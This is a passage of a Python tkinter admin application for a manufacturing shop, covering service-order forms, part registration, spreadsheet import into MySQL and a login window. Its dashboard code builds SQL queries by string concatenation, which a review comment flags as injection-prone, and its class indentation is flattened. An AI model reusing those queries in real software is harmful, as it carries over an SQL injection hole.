    lbl = Label(self.frameOS2, font=('arial', 10), text='Produto', bg='white')
    lbl.place(relx=0.040, rely=0.370)
    self.campoProduto = Entry(self.frameOS2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varProduto)
    self.campoProduto.place(relx=0.040, rely=0.490, relwidth=0.500)
    lbl = Label(self.frameOS2, font=('arial', 10), text='QTDE', bg='white')
    lbl.place(relx=0.600, rely=0.370)
    self.campoQTDE = Entry(self.frameOS2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varQTDE)
    self.campoQTDE.place(relx=0.600, rely=0.490, relwidth=0.080)
    lbl = Label(self.frameOS2, font=('arial', 10), text='Data Prevista', bg='white')
    lbl.place(relx=0.800, rely=0.370)
    self.campoDataPrevista = Entry(self.frameOS2, font=('arial', 12), relief=GROOVE, border=2, textvariable=dataPrevi)
    self.campoDataPrevista.place(relx=0.800, rely=0.490, relwidth=0.180)
    lbl = Label(self.frameOS2, font=('arial', 10), text='Ord. de Abertura', bg='white')
    lbl.place(relx=0.040, rely=0.700)
    # Prefilled with the logged-in user's name; read-only for the user.
    self.campoOrdemAbertura = Entry(self.frameOS2, font=('arial', 12), relief=GROOVE, border=2)
    self.campoOrdemAbertura.place(relx=0.040, rely=0.820, relwidth=0.500)
    self.campoOrdemAbertura.insert('end', nome)
    self.campoOrdemAbertura['state'] = DISABLED
    lbl = Label(self.frameOS2, font=('arial', 10), text='Tipo de Pedido', bg='white')
    lbl.place(relx=0.700, rely=0.700)
    self.tipoOS = ttk.Combobox(self.frameOS2, font=('arial',10), state='readonly')
    self.tipoOS['values'] = ('Select', 'Comum', 'Urgente', 'Interno', 'Corretivo', 'Preventivo')
    self.tipoOS.current(0)
    self.tipoOS.place(relx=0.700, rely=0.820)
    lbl = Label(self.frameOS3, font=('arial', 10), text='Complemento', bg='white')
    lbl.place(relx=0.040, rely=0.060)
    self.campoComplemento = Text(self.frameOS3, font=('arial', 13), relief=GROOVE, border=2)
    self.campoComplemento.place(relx=0.040, rely=0.160, relwidth=0.900, relheight=0.300)
    lbl = Label(self.frameOS3, font=('arial', 10), text='Observação', bg='white')
    lbl.place(relx=0.040, rely=0.480)
    self.campoObservação = Text(self.frameOS3, font=('arial', 13), relief=GROOVE, border=2)
    self.campoObservação.place(relx=0.040, rely=0.570, relwidth=0.900, relheight=0.300)
    # Module-level reference keeps the PhotoImage from being garbage-collected
    # while displayed (tkinter does not hold its own reference).
    global imgProximo
    imgProximo = PhotoImage(file='image/proximo.png')
    self.botProximoOS = Button(self.frameOS1, image=imgProximo, border=0, relief=FLAT, bg='white', command=self.exibir_segunda_aba)
    self.botProximoOS.place(relx=0.850, rely=0.920)
def segunda_aba(self):
    """Build page two of the "create O.S." window: part lookup form and the part-list treeview.

    Widgets are only created here; exibir_segunda_aba() places them.
    """
    self.frameOS4 = Frame(self.frameOS1, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
    self.frameOS5 = Frame(self.frameOS1 ,highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
    lbl = Label(self.frameOS4, font=('arial', 10), text='Código da Peça', bg='white')
    lbl.place(relx=0.040, rely=0.050)
    # Search field: Return triggers the lookup, as does the "Ok" button.
    self.campoCP = Entry(self.frameOS4, font=('arial', 12), relief=GROOVE, border=2)
    self.campoCP.place(relx=0.040, rely=0.220, relwidth=0.200)
    self.campoCP.bind("<Return>", self.buscar_peca)
    botaoBuscar = Button(self.frameOS4, text='Ok', border=2, command = lambda: self.buscar_peca(''))
    botaoBuscar.place(relx=0.242, rely=0.215)
    lbl = Label(self.frameOS4, font=('arial', 10), text='Nome da Peça', bg='white')
    lbl.place(relx=0.450, rely=0.050)
    # Detail fields start disabled; buscar_peca() fills them.
    self.campoN = Entry(self.frameOS4, font=('arial', 12), relief=GROOVE, border=2, state=DISABLED)
    self.campoN.place(relx=0.450, rely=0.220, relwidth=0.500)
    lbl = Label(self.frameOS4, font=('arial', 10), text='QTDE', bg='white')
    lbl.place(relx=0.040, rely=0.500)
    self.campoQ = Spinbox(self.frameOS4, from_=1, to=1000, font=('arial', 12), relief=GROOVE, border=2)
    self.campoQ.place(relx=0.040, rely=0.680, relwidth=0.080)
    lbl = Label(self.frameOS4, font=('arial', 10), text='Material', bg='white')
    lbl.place(relx=0.450, rely=0.420)
    self.campoM = Entry(self.frameOS4, font=('arial', 12), relief=GROOVE, border=2, state=DISABLED)
    self.campoM.place(relx=0.450, rely=0.620, relwidth=0.200)
    lbl = Label(self.frameOS4, font=('arial', 10), text='Tratamento', bg='white')
    lbl.place(relx=0.680, rely=0.420)
    self.campoT = Entry(self.frameOS4, font=('arial', 12), relief=GROOVE, border=2, state=DISABLED)
    self.campoT.place(relx=0.680, rely=0.620, relwidth=0.300)
    botaAdd = Button(self.frameOS4, text='Adcionar', border=2, command=self.adcionar_peca_lista)
    botaAdd.place(relx=0.310, rely=0.320)
    botaRemove = Button(self.frameOS4, text='Remover', border=2, command=self.remover_peca_lista)
    botaRemove.place(relx=0.310, rely=0.550)
    # Treeview listing the parts added to this O.S.
    self.listaPecas = ttk.Treeview(self.frameOS5, column=('1','2','3','4','5','6','7'), show='headings')
    self.listaPecas.heading('1', text='ID')
    self.listaPecas.heading('2', text='Nome da Peça')
    self.listaPecas.heading('3', text='Cód. Peça')
    self.listaPecas.heading('4', text='QTDE')
    self.listaPecas.heading('5', text='Material')
    self.listaPecas.heading('6', text='Tratamento')
    self.listaPecas.heading('7', text='Cód. Desenho')
    # NOTE(review): width=-20 for the ID column looks unintentional — confirm.
    self.listaPecas.column("1", width=-20, anchor='n')
    self.listaPecas.column("2", width=200, anchor='n')
    self.listaPecas.column("3", width=40, anchor='n')
    self.listaPecas.column("4", width=10, anchor='n')
    self.listaPecas.column("5", width=90, anchor='n')
    self.listaPecas.column("6", width=80, anchor='n')
    self.listaPecas.column("7", width=80, anchor='n')
    self.listaPecas.place(relx=0, rely=0, relwidth=0.975, relheight=0.999)
    self.listaPecas.bind("<Escape>", lambda event: self.remover_focus(event, self.listaPecas))
    scrollbar = Scrollbar(self.frameOS5, orient="vertical", command=self.listaPecas.yview)
    self.listaPecas.configure(yscrollcommand=scrollbar.set)
    scrollbar.place(relx=0.975, rely=0, relwidth=0.025, relheight=0.999)
    # Module-level reference keeps the PhotoImage from being garbage-collected
    # while displayed (tkinter does not hold its own reference).
    global imgfinalizar
    imgfinalizar = PhotoImage(file='image/finalizar.png')
    # Created here but placed later by exibir_segunda_aba().
    self.botFinalizarOS = Button(self.frameOS1, image=imgfinalizar, border=0, relief=FLAT, bg='white', command=self.confirmar_tela_os)
def criar_ordem_de_servico(self):
    """Open the modal "create service order" window and build both of its pages."""
    self.janelaCriarOS = Toplevel()
    self.janelaCriarOS.title('Criar Ordem de Serviço')
    self.centraliza_tela(800, 500, self.janelaCriarOS)
    self.janelaCriarOS['bg'] = 'white'
    # Part ids already added to the list (duplicate guard).
    self.count_lista = []
    self.primeira_aba()
    self.exibir_primeira_aba()
    self.segunda_aba()
    # Keep the window modal over the orders tab.
    self.janelaCriarOS.transient(self.aba4)
    self.janelaCriarOS.focus_force()
    self.janelaCriarOS.grab_set()
    self.janelaCriarOS.mainloop()
class Pecas:
#Bloco cadastro de peça manualmente e respectivas funções de inserção
def confirmarCamposCadPeca(self):
    """Collect the part-registration fields; return False (with an alert) when a mandatory one is empty."""
    # Snapshot the form (upper-cased for the fields the schema stores upper case).
    self.campP = self.descriPeca.get().upper()
    self.campM = self.campoMaterial.get().upper()
    self.campC = self.campoCodPeca.get()
    self.campT = self.campoTratamento.get().upper()
    self.campD = self.campoCodDesenho.get().upper()
    # Mandatory fields.
    if self.descriPeca.get() == '':
        messagebox.showinfo(parent=self.janelaCadPeca, title='Alerta', message='A descrição de Peça é obrigatório.')
        return False
    if self.campoCodPeca.get() == '':
        messagebox.showinfo(parent=self.janelaCadPeca, title='Alerta', message='O código de Peça é obrigatório.')
        return False
    # Optional fields fall back to a placeholder.
    if self.campoMaterial.get() == '':
        self.campM = 'Não informado'
    if self.campoTratamento.get() == '':
        self.campT = 'Não informado'
    if self.campoCodDesenho.get() == '':
        self.campD = 'Não informado'
    return True
def salvar_peca(self):
    """Insert the part collected by confirmarCamposCadPeca; return True on success.

    Uses a parameterized INSERT — the original concatenated the form
    values into the SQL string (injection risk).  A duplicate part code
    surfaces as IntegrityError and is reported to the user.
    """
    dataCadastro = str(datetime.now())
    try:
        self.cursor.execute(
            "INSERT INTO pecas VALUES (NULL, %s, %s, %s, %s, %s, %s)",
            (self.campP, self.campC, self.campM, self.campT, self.campD, dataCadastro))
    except mysql.connector.errors.IntegrityError:
        messagebox.showinfo(parent=self.janelaCadPeca, title='Alerta', message='Nº de peça já existente')
        return False
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
        messagebox.showerror(parent=self.janelaCadPeca, title='Alerta', message='Erro ao tentar inserir dados')
        return False
    else:
        return True
def confirmar_cad_peca(self):
    """Validate and save the part; on success report it and close the registration window."""
    # Both steps show their own error dialog on failure.
    if not (self.confirmarCamposCadPeca() and self.salvar_peca()):
        return ''
    if messagebox.showinfo(parent=self.janelaCadPeca, title='Alerta', message='Peça cadastrada com sucesso'):
        self.janelaCadPeca.destroy()
def janela_cadastrar_peca(self):
    """Open the modal window used to register a single part.

    Builds the form (description, part code, material, treatment and
    drawing code), installs per-field length/character limiters via
    StringVar 'w' traces, and blocks in its own mainloop until closed.
    The Finish button triggers confirmar_cad_peca.
    """
    self.janelaCadPeca = Toplevel()
    self.janelaCadPeca.title('Cadastrar Peça')
    self.centraliza_tela(600, 300, self.janelaCadPeca)
    self.janelaCadPeca['bg'] = 'white'
    frame1 = Frame(self.janelaCadPeca, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
    frame1.place(relx=0.020, rely=0.030, relwidth=0.960, relheight=0.940)
    frame2 = Frame(frame1, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
    frame2.place(relx=0.020, rely=0.050, relwidth=0.960, relheight=0.700)
    def format_nome_peca(*args):
        # Cap the description at 170 characters.
        mask = varDescriPeca.get()
        varDescriPeca.set(mask[:170])
    def format_cod_peca(*args):
        # Cap the part code at 13 characters and reject non-digits
        # (the last typed character is dropped when not numeric).
        mask = varCodPeca.get()
        varCodPeca.set(mask[:13])
        if len(mask) >= 1 and not mask[-1].isnumeric():
            varCodPeca.set(mask[0:len(mask) - 1])
    def format_campo_material(*args):
        # Cap the material field at 30 characters.
        mask = varMaterial.get()
        varMaterial.set(mask[:30])
    def format_tratamento(*args):
        # Cap the treatment field at 30 characters.
        mask = varTratamento.get()
        varTratamento.set(mask[:30])
    def format_cod_desenho(*args):
        # Cap the drawing code at 15 characters.
        mask = varCodDesenho.get()
        varCodDesenho.set(mask[:15])
    # Trace every field so the limiters above run on each keystroke.
    varDescriPeca = StringVar()
    varDescriPeca.trace('w', format_nome_peca)
    varMaterial = StringVar()
    varMaterial.trace('w', format_campo_material)
    varCodPeca = StringVar()
    varCodPeca.trace('w', format_cod_peca)
    varTratamento = StringVar()
    varTratamento.trace('w', format_tratamento)
    varCodDesenho = StringVar()
    varCodDesenho.trace('w', format_cod_desenho)
    # Form labels and entries ("**" marks required fields).
    lbl = Label(frame2, font=('arial', 10), text='Descrição da Peça **', bg='white', fg='#344f84')
    lbl.place(relx=0.040, rely=0.030)
    self.descriPeca = Entry(frame2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varDescriPeca)
    self.descriPeca.place(relx=0.040, rely=0.160, relwidth=0.920)
    self.descriPeca.focus_force()
    lbl = Label(frame2, font=('arial', 10), text='Cód. da Peça **', bg='white', fg='#344f84')
    lbl.place(relx=0.040, rely=0.370)
    self.campoCodPeca = Entry(frame2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varCodPeca)
    self.campoCodPeca.place(relx=0.040, rely=0.490, relwidth=0.200)
    lbl = Label(frame2, font=('arial', 10), text='Material (Opcional)', bg='white', fg='#344f84')
    lbl.place(relx=0.350, rely=0.370)
    self.campoMaterial = Entry(frame2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varMaterial)
    self.campoMaterial.place(relx=0.350, rely=0.490, relwidth=0.600)
    lbl = Label(frame2, font=('arial', 10), text='Tratamento (Opcional)', bg='white', fg='#344f84')
    lbl.place(relx=0.040, rely=0.700)
    self.campoTratamento = Entry(frame2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varTratamento)
    self.campoTratamento.place(relx=0.040, rely=0.820, relwidth=0.500)
    lbl = Label(frame2, font=('arial', 10), text='Cód. do Desenho (Opcional)', bg='white', fg='#344f84')
    lbl.place(relx=0.680, rely=0.700)
    self.campoCodDesenho = Entry(frame2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varCodDesenho)
    self.campoCodDesenho.place(relx=0.680, rely=0.820, relwidth=0.260)
    # Finish button; image kept in a local that survives while this
    # method blocks in mainloop() below.
    imgfinalizar = PhotoImage(file='image/finalizar2.png')
    botFinalizar = Button(frame1, image=imgfinalizar, border=0, relief=FLAT, bg='white', command=self.confirmar_cad_peca)
    botFinalizar.place(relx=0.820, rely=0.850)
    # Modal behavior: tied to the parts window, keyboard focus grabbed.
    self.janelaCadPeca.transient(self.janelaPeca)
    self.janelaCadPeca.focus_force()
    self.janelaCadPeca.grab_set()
    self.janelaCadPeca.mainloop()
#Bloco de exibição das peças e opções de cadastrar ou importar mais
def exibir_pecas_importacao(self):
    """Import parts from the loaded spreadsheet and show them in the UI.

    Iterates the rows of ``self.excel``.  Rows whose reference starts
    with '9' and is exactly 13 characters long are inserted into the
    ``pecas`` table (at most the first 10 such rows, per the original
    ``cont`` guard) and into the Treeview; 9-prefixed rows that do not
    match the 13-character pattern have their index collected in
    ``listaItem``.  Runs on a worker thread; updates the progress bar
    and the live labels, then shows a completion dialog and closes the
    progress window (or aborts with an error dialog, returning 0).
    """
    # Indices of rows whose reference does not match the expected pattern.
    listaItem = []
    idItem = 0
    cont = 0
    # Spreadsheet columns and the import timestamp are loop-invariant:
    # read/convert them once instead of on every iteration.
    referencias = self.excel['Referência']
    descricoes = self.excel['Descrição']
    dataImport = str(self.dataImport)
    for dado in range(len(referencias)):
        # Advance the progress bar as rows are processed.
        self.progressbar['value'] = dado
        # Items whose reference starts with '9' are parts.
        if referencias[dado][0] == '9':
            # Only parts matching the standard 13-character code are imported.
            if len(referencias[dado]) == 13:
                # Show the row currently being processed.
                self.ll1['text'] = f'Referência: {referencias[dado]}'
                self.ll2['text'] = f'Descrição: {descricoes[dado]}'
                try:
                    cont += 1
                    if cont <= 10:
                        idItem += 1
                        # Parameterized query: safe against SQL injection
                        # and quote characters inside the description.
                        self.cursor.execute(
                            "INSERT INTO pecas VALUES (%s, %s, %s, DEFAULT, DEFAULT, DEFAULT, %s)",
                            (idItem, descricoes[dado], referencias[dado], dataImport),
                        )
                        self.treeviewPecas.insert("", "end", values=(idItem, descricoes[dado], referencias[dado], 'Não informado', 'Não informado', 'Não informado', dataImport))
                except mysql.connector.errors.IntegrityError:
                    # Duplicate value: skip this row and keep going.
                    print('passou')
                except mysql.connector.errors.OperationalError:
                    # Connection lost mid-import: report and abort.
                    if messagebox.showerror(parent=self.janelaInicial, title='Conexão perdida', message='Erro ao importar dados, conexão perdida com Banco MYSQL.'):
                        self.janelaProcesso.destroy()
                    return 0
                except Exception as erro:
                    # Any other unexpected failure: report and abort.
                    print(f'{erro}, {(erro.__class__)}')
                    if messagebox.showerror(parent=self.janelaInicial, title='Falha na importação', message='Uma falha inesperada aconteceu na importação.'):
                        self.janelaProcesso.destroy()
                    return 0
            else:
                # Non-standard part code: remember its row index.
                listaItem.append(dado)
    # Success: notify and close the progress window.
    if messagebox.showinfo(parent=self.janelaInicial, title='Importação concluída', message='Importação concluída com sucesso!'):
        self.janelaProcesso.destroy()
def abrir_arquivo(self):
    """Ask the user for an XLS file and load it with pandas.

    Returns 0 when the dialog is cancelled or the file cannot be read;
    otherwise opens the import-progress window
    (janela_exibir_dados_importacao_xml).
    """
    self.caminhoXLS = filedialog.askopenfilename(
        title='Selecione o arquivo desejado',
        filetypes=(('Arquivos XLS', '*.xls'), ('All files', '*.*')))
    # Dialog cancelled: askopenfilename returns an empty path.
    # (The old bare except relied on read_excel('') raising.)
    if not self.caminhoXLS:
        return 0
    try:
        self.excel = pd.read_excel(self.caminhoXLS)
    except Exception:
        # Unreadable/corrupt file: abort quietly, as before.
        return 0
    # Show the rows being transferred.
    self.janela_exibir_dados_importacao_xml()
def janela_exibir_dados_importacao_xml(self):
    """Open the progress window for a spreadsheet import.

    Shows the chosen file path, the row currently being imported, the
    import timestamp and a progress bar, then runs the import itself
    (exibir_pecas_importacao) on a background thread so the UI stays
    responsive while this window blocks in its own mainloop.
    """
    self.janelaProcesso = Toplevel()
    self.janelaProcesso.title('Importando dados')
    self.centraliza_tela(500, 200, self.janelaProcesso)
    self.janelaProcesso['bg'] = 'white'
    lbl = Label(self.janelaProcesso, text=f'Arquivo: {self.caminhoXLS}', font=('arial', 10), bg='white')
    lbl.place(relx=0.0, rely=0.130)
    # Labels updated live by the import thread.
    self.ll1 = Label(self.janelaProcesso, text='Referência:', font=('arial', 10), bg='white')
    self.ll1.place(relx=0.0, rely=0.300)
    self.ll2 = Label(self.janelaProcesso, text='Descrição:', font=('arial', 10), bg='white')
    self.ll2.place(relx=0.0, rely=0.400)
    # Timestamp also used by the import as the parts' registration date.
    self.dataImport = datetime.now()
    data = self.dataImport.strftime('Data de Importação: %H:%M:%S do %d/%m/%Y')
    ll3 = Label(self.janelaProcesso, text=data, font=('arial', 10), bg='white')
    ll3.place(relx=0.0, rely=0.500)
    # Progress bar driven by the import loop.  maximum=10483 is a
    # hard-coded value — presumably the expected spreadsheet row count;
    # TODO confirm.
    self.progressbar = ttk.Progressbar(self.janelaProcesso, orient='horizontal', mode='determinate', maximum=10483)
    self.progressbar.place(relx=0.0, rely=0.800, relwidth=0.999)
    # Worker thread performs the XML/XLS import and the UI updates.
    threading.Thread(target=self.exibir_pecas_importacao,).start()
    self.janelaProcesso.transient(self.aba4)
    self.janelaProcesso.focus_force()
    self.janelaProcesso.grab_set()
    self.janelaProcesso.mainloop()
def janela_exibir_pecas(self):
    """Open the window that lists every registered part.

    Shows toolbar buttons for registering a new part and importing
    parts from a spreadsheet, plus a scrollable Treeview populated
    from the ``pecas`` table.
    """
    self.janelaPeca = Toplevel()
    self.janelaPeca.title('Cadastrar Peça')
    self.centraliza_tela(800, 500, self.janelaPeca)
    self.janelaPeca['bg'] = 'white'
    # Button images live in module globals so Tkinter does not lose
    # them to garbage collection.
    global img01
    img01 = PhotoImage(file='image/ferramenta.png')
    botCadPeca = Button(self.janelaPeca, text='Cad. Peça', image=img01, compound=TOP, font=('arial', 9), bg='white', fg='black', relief=SOLID, border=0, command=self.janela_cadastrar_peca)
    botCadPeca.place(relx=0.050, rely=0.030)
    global img02
    img02 = PhotoImage(file='image/importar.png')
    botImport = Button(self.janelaPeca, text='Import Dados', image=img02, compound=TOP, font=('arial', 9), bg='white', fg='black', relief=SOLID, border=0, command=self.abrir_arquivo)
    botImport.place(relx=0.200, rely=0.030)
    # Thin divider line under the toolbar.
    divisor = Canvas(self.janelaPeca, bg='#e1e1e1')
    divisor.place(relx=0.050, rely=0.190, relwidth=0.900, relheight=0.005)
    # Column spec: (identifier, heading text, width).
    colunas = (
        ('1', 'ID', 1),
        ('2', 'Descrição', 200),
        ('3', 'Cod. Peça', 100),
        ('4', 'Material', 100),
        ('5', 'Tratamento', 100),
        ('6', 'Cod. Desenho', 100),
        ('7', 'Data Cadastrada', 100),
    )
    self.treeviewPecas = ttk.Treeview(self.janelaPeca, column=tuple(c[0] for c in colunas), show='headings')
    for ident, titulo, largura in colunas:
        self.treeviewPecas.heading(ident, text=titulo)
        self.treeviewPecas.column(ident, width=largura, anchor='n')
    self.treeviewPecas.place(relx=0, rely=0.350, relwidth=0.975, relheight=0.640)
    self.treeviewPecas.bind("<Escape>", lambda event: self.remover_focus(event, self.treeviewPecas))
    barra = Scrollbar(self.janelaPeca, orient="vertical", command=self.treeviewPecas.yview)
    self.treeviewPecas.configure(yscrollcommand=barra.set)
    barra.place(relx=0.975, rely=0.350, relwidth=0.025, relheight=0.640)
    # Load every registered part into the Treeview.
    self.cursor.execute("select id, Descricao, CodPeca, Material, Tratamento, CodDesenho, DataCadastro from pecas")
    for registro in self.cursor.fetchall():
        self.treeviewPecas.insert("", "end", values=tuple(registro))
    # Modal behavior relative to the service-order tab.
    self.janelaPeca.transient(self.aba4)
    self.janelaPeca.focus_force()
    self.janelaPeca.grab_set()
    self.janelaPeca.mainloop()
class Application(Funcs, Database_Server, Ordem_Servico, Pecas):
def __init__(self):
    """Build the admin login window and start the Tk event loop.

    Creates the login form (numeric CPF + numeric password), installs
    input limiters on both fields, connects to the database and warns
    the user when the connection fails.
    """
    self.janelaFuncio = tix.Tk()
    self.janelaFuncio.title('Login Admin')
    self.janelaFuncio.configure(background='white')
    self.janelaFuncio.minsize(500, 400)
    # Start fully transparent; faded in via after() below.
    self.janelaFuncio.attributes('-alpha', 0.0)
    # Center the window on screen.
    self.centraliza_tela(600, 600, self.janelaFuncio)
    self.frameLogin = Frame(self.janelaFuncio, highlightbackground='white', highlightcolor='white', highlightthickness=5, bg='white')
    self.frameLogin.place(relx=0.100, rely=0.150, relwidth=0.780, relheight=0.730)
    logo = PhotoImage(file='image/logoMultimoldes.png')
    lblLogo = Label(self.frameLogin, image=logo, bg='white')
    lblLogo.place(relx=0.500, rely=0.130, anchor='center')
    self.labelLogin = Label(self.frameLogin, text='Usuário', bg='white', fg='#344f84', font=('arial',15,'bold'))
    self.labelLogin.place(relx=0.070, rely=0.420)
    # Limits both login fields: CPF to 11 digits, password to 8 digits.
    def limite_campos_login(*args):
        # The truthiness guards fix a recursion bug: calling set() from
        # inside a 'w' trace re-triggers the trace, and the old code
        # called set('') unconditionally whenever a field was empty
        # (''.isnumeric() is False), recursing without bound.
        varCPF = cLogin.get()
        varSenha = cSenha.get()
        if varCPF and (len(varCPF) > 11 or not varCPF.isnumeric()):
            cLogin.set(varCPF[:-1])
        if varSenha and (len(varSenha) > 8 or not varSenha.isnumeric()):
            cSenha.set(varSenha[:-1])
    # Trace both fields so the limiter runs on every keystroke.
    cLogin = StringVar()
    cLogin.trace('w', limite_campos_login)
    cSenha = StringVar()
    cSenha.trace('w', limite_campos_login)
    self.campLogin = Entry(self.frameLogin, font=('arial', 14), textvariable=cLogin, border=2, relief=GROOVE)
    self.campLogin.place(relx=0.290, rely=0.430, relwidth=0.500)
    self.campLogin.bind("<Return>", self.confirmar_login)
    self.labelSenha = Label(self.frameLogin, text='Senha', bg='white', fg='#344f84', font=('arial',15,'bold'))
    self.labelSenha.place(relx=0.070, rely=0.540)
    # show='l' with the Wingdings font renders a masking glyph per char.
    self.campSenha = Entry(self.frameLogin, show='l', font=('wingdings', 14, 'bold'), textvariable=cSenha, border=2, relief=GROOVE)
    self.campSenha.place(relx=0.290, rely=0.550, relwidth=0.500)
    self.campSenha.bind("<Return>", self.confirmar_login)
    # confirmar_login apparently expects an event-like positional
    # argument; the lambda passes a dummy value for button clicks —
    # TODO confirm against confirmar_login's signature.
    self.botao = Button(self.frameLogin, text='Confirmar', fg='white', activeforeground='white', bg='#344f84', activebackground='#344f84', border=0, font=('arial', 13, 'bold'), width=10, command = lambda: self.confirmar_login(self.confirmar_login))
    self.botao.place(relx=0.390, rely=0.750)
    self.botao.bind("<Return>", self.confirmar_login)
    # Fade the window in after 3 seconds.
    self.janelaFuncio.after(3000, self.janelaFuncio.attributes, "-alpha", 0.93)
    self.connection_database()
    if not self.bancoConnect:
        messagebox.showerror('Verifique a conexão', 'Sem conexão com Banco de Dados')
    self.campLogin.focus_force()
    self.janelaFuncio.mainloop()
def janela_raiz(self):
    """Build and show the main application window (post-login).

    Creates the menu bar, the four notebook tabs, delegates each tab's
    contents to its aba_* builder, and enters the mainloop.
    """
    self.janelaInicial = Toplevel()
    self.janelaInicial.title('Multimoldes Admin')
    self.janelaInicial.iconbitmap('image/icone.ico')
    self.janelaInicial.resizable(0,0)
    self.sistemaOperacional = system()
    # Maximize the window using the mechanism appropriate to the OS.
    if self.sistemaOperacional == 'Windows':
        self.janelaInicial.state('zoomed')
    else:
        self.janelaInicial.attributes('-zoomed', True)
    corPadrao = self.janelaInicial['bg']  # NOTE(review): unused in this method
    menubar = Menu(self.janelaInicial)
    self.janelaInicial.config(menu=menubar)
    filemenu = Menu(menubar)
    filemenu2 = Menu(menubar)
    menubar.add_cascade(label='Opções', menu=filemenu)
    # NOTE(review): the next three cascades all share filemenu2 — looks
    # unintentional; confirm whether each should get its own Menu.
    menubar.add_cascade(label='Configurações', menu=filemenu2)
    menubar.add_cascade(label='Relatório', menu=filemenu2)
    menubar.add_cascade(label='Sobre', menu=filemenu2)
    filemenu.add_command(label='Abrir OS', command=self.criar_ordem_de_servico)
    filemenu.add_command(label='Cad. Peça', command=self.janela_cadastrar_peca)
    filemenu.add_command(label='Sair', command=self.sair)
    # Create and add the notebook tabs.
    self.abas = ttk.Notebook(self.janelaInicial)
    self.aba1 = Frame(self.abas, bg='white')
    self.aba2 = Frame(self.abas, bg='white')
    self.aba3 = Frame(self.abas, bg='white')
    self.aba4 = Frame(self.abas, bg='white')
    self.abas.add(self.aba1, text='Principal')
    self.abas.add(self.aba2, text='Funcionários')
    self.abas.add(self.aba3, text='Cadastrar')
    self.abas.add(self.aba4, text='Ord. de Serviço')
    self.abas.place(relx=0, rely=0, relwidth=1, relheight=1)
    self.framePri = Frame(self.aba4, bg='white', highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2)
    self.framePri.place(relx=0.045, rely=0.010, relwidth=0.910, relheight=0.970)
    # Multimoldes logo on the "Cadastrar" tab.  The image is held in a
    # local; it stays alive only because this method blocks in
    # mainloop() below — moving mainloop elsewhere would let Tk lose it.
    image = PhotoImage(file='image/logo-multimoldes.png')
    self.logo = Label(self.aba3, image=image, bg='white')
    self.logo.pack()
    # Populate each tab.
    self.aba_principal()
    self.aba_funcionarios()
    self.aba_cadastro()
    self.aba_ordem_de_servico()
    self.janelaInicial.protocol('WM_DELETE_WINDOW', self.sair)
    self.janelaInicial.mainloop()
#Abas com as funcionalidades do programa
def aba_principal(self):
    """Build the "Principal" (dashboard) tab.

    Shows today's counters (items produced, reworked, machine stops),
    two self-animating donut-style canvases and an operator-ranking
    canvas.  All database failures are swallowed so the tab still
    renders with empty counters when the DB is unavailable.
    """
    # Indicator labels.
    linfo1 = Label(self.aba1, text='Itens produzidos', font=('arial', 14), bg='white', fg='black')
    linfo1.place(relx=0.100, rely=0.055)
    ldados1 = Label(self.aba1, font=('arial', 20), bg='white', fg='#45ccce')
    ldados1.place(relx=0.220, rely=0.045)
    try:
        # Count distinct parts whose orders were all closed today.
        # NOTE(review): these queries are built by string concatenation
        # (injection-prone), and "IN ("+forma+")" is a SQL syntax error
        # when forma is empty — the broad except below hides that case.
        self.dataHoje = str(datetime.now().date())
        self.cursor.execute("SELECT DISTINCT peca FROM ordem_processo WHERE DataFinalizada LIKE '%"+self.dataHoje+"%' AND Estado = 'fechada'")
        self.pecas = self.cursor.fetchall()
        # Build a comma-separated id list for the IN clause.
        forma = ''
        for v in self.pecas:
            forma += str(v[0])+','
        c = len(forma)
        c -= 1
        forma = forma[:c]  # drop the trailing comma
        # Parts that also have a non-closed order today.
        self.cursor.execute("SELECT DISTINCT peca FROM ordem_processo WHERE Peca IN ("+forma+") AND Estado <> 'fechada' AND DataFinalizada LIKE '%"+self.dataHoje+"%'")
        a = self.cursor.fetchall()
        if a != []:
            # Exclude parts still in progress from the finished count.
            a = a[0]
            forma = ''
            for v in a:
                forma += str(v)+','
            c = len(forma)
            c -= 1
            forma = forma[:c]
            self.cursor.execute("SELECT count(DISTINCT peca) FROM ordem_processo WHERE Peca NOT IN ("+forma+") AND Estado = 'fechada' AND DataFinalizada LIKE '%"+self.dataHoje+"%'")
            a = self.cursor.fetchall()[0]
        else:
            self.cursor.execute("SELECT COUNT(DISTINCT peca) FROM ordem_processo WHERE Peca IN ("+forma+") AND Estado = 'fechada' AND DataFinalizada LIKE '%"+self.dataHoje+"%'")
            a = self.cursor.fetchall()[0]
        ldados1['text'] = a[0]
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
        pass
    linfo2 = Label(self.aba1, text='Itens em andamento', font=('arial', 14), bg='white', fg='black')
    linfo2.place(relx=0.320, rely=0.055)
    linfo3 = Label(self.aba1, text='Itens retrabalhados', font=('arial', 14), bg='white', fg='black')
    linfo3.place(relx=0.540, rely=0.055)
    ldados3 = Label(self.aba1, font=('arial', 20), bg='white', fg='red')
    ldados3.place(relx=0.680, rely=0.045)
    try:
        # Count today's closed rework orders.
        self.cursor.execute("SELECT COUNT(Tipo) FROM ordem_processo WHERE Tipo = 'Retrabalhar OS' AND Estado = 'fechada' AND DataFinalizada LIKE '%"+self.dataHoje+"%'")
        ldados3['text'] = self.cursor.fetchall()[0][0]
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
        pass
    linfo4 = Label(self.aba1, text='Paradas de máquinas', font=('arial', 14), bg='white', fg='black')
    linfo4.place(relx=0.760, rely=0.055)
    ldados4 = Label(self.aba1, font=('arial', 20), bg='white', fg='orange')
    ldados4.place(relx=0.920, rely=0.045)
    try:
        # Count today's machine stops.
        self.cursor.execute("SELECT COUNT(id) FROM pausas WHERE DataPause LIKE '%"+self.dataHoje+"%' ")
        ldados4['text'] = self.cursor.fetchall()[0][0]
    except:
        pass
    # Frame with the "finished orders" donut chart.
